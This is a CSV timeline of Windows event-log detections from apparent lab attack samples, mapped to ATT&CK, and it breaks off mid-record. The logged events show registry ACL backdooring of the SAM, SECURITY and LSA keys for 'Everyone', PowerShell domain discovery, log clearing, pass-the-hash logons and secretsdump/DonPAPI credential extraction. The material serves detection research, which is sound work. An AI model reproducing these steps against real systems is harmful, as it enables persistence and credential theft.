+09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : 
SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify 
registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.571 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.587 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; 
value=""[FS03 : SECURITY] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.603 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SECURITY] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.627 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring started for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.634 
+09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.634 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): 
name=""ArgumentList""; value=""win32_Trustee""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Applying Trustee to new Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SAM\SAM\Domains\Account] Backdooring completed for key""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx 
+2021-12-10 04:54:03.650 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Backdooring completed for system""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""PSObject""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""ComputerName"" ParameterBinding(Add-Member): name=""Value""; value=""FS03"" ParameterBinding(Add-Member): name=""InputObject""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry 
permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Member): ""Add-Member"" ParameterBinding(Add-Member): name=""MemberType""; value=""NoteProperty"" ParameterBinding(Add-Member): name=""Name""; value=""BackdoorTrustee"" ParameterBinding(Add-Member): name=""Value""; value=""S-1-1-0"" ParameterBinding(Add-Member): name=""InputObject""; value=""@{ComputerName=FS03}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-10 04:54:03.666 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""@{ComputerName=FS03; BackdoorTrustee=S-1-1-0}""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,"foreach ($s in [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites ){write-host ""[>] (site) $s"";foreach ($r in $s.Subnets){write-host "" └─> (subnet) $r"";foreach ($m in $s.Servers){write-host "" └─> (server) $m""}}}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 15:56:59.657 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): 
""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) OFFSEC-PREMISE""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Host): ""Write-Host"" ParameterBinding(Write-Host): name=""Object""; value=""[>] (site) LONDON""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 15:56:59.673 +09:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1482-Domain Trust Discovery/ID800,4103,4104-Active Directory Forest PowerShell class.evtx" +2021-12-12 16:15:28.352 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: hack1,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP 
Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.716 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c7c,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:15:56.724 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.740 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.756 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ 
| Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.782 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.797 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.817 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8723c99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 
+2021-12-12 16:15:56.829 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\ZuExrArX.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:56.929 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:58.454 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x33c | User: FS03VULN$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\XwYybEmH.tmp | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.403 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.693 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.709 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\AppData\Roaming\Microsoft\Protect | IP Addr: 10.23.123.11 | LID: 0x8723c99,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:15:59.714 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 